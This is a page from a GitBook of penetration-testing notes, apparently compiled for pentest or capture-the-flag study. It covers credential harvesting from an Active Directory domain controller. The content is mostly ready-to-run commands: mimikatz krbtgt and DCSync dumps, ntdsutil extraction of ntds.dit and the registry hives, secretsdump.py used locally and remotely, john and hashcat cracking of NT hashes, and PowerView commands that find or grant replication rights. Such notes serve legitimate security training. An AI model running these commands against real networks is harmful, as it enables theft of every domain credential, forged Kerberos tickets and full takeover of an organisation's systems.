📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • TGT Dump
  • NTDS Dump
  • DC Sync
  • Run on DC
  • Run remotely
  1. Active Directory
  2. Credentials harvesting

Domain Controller specific

TGT Dump

dump the hash used by the domain controller to sign Kerberos tickets. This allows an attacker to create custom tickets and impersonate other users or gain access to different services/hosts

lsadump::dcsync /user:krbtgt
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt

NTDS Dump

NTDS is an encrypted database containing information about the structure and elements of the AD.

In order to dump the stored hashes we need to extract the following files.

C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

To dump the required files use the following command in PowerShell

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full <dump folder>' q q"

Extract the hashes

secretsdump.py -security <security file> -system <system file> -ntds <path to ntds.dit> LOCAL

Crack the hashes. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure AAAA:BBBB the actual string to bruteforce is the one to the right of the column

john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hash> <wordlist> #rows follow the format <user>:<hash>

DC Sync

To execute this attack we need to operate under a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. By default Local and Domain Administrators own these privileges.

Find users with the required privileges with PowerView

Get-ObjectACL -DistinguishedName "dc=<domain>,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }

If the current user lacks the required permissions run this command on the DC to add them.

Add-ObjectAcl -TargetDistinguishedName "dc=<domain>,dc=local" -PrincipalSamAccountName <user

Run on DC

lsadump::dcsync /user:krbtgt                    //Kerberos TGT
lsadump::dcsync /user:<user>                    //get user info 
lsadump::dcsync /domain:htb.local /all /csv     //dump all users

Run remotely

secretsdump.py -just-dc  <domain>/<DC user>@<DC IP>      //dump NTDS
secretsdump.py -just-dc-ntlm <domain>/<DC user>@<DC IP>  //dump TGT
PreviousCredentials harvestingNextConnection

Last updated 1 year ago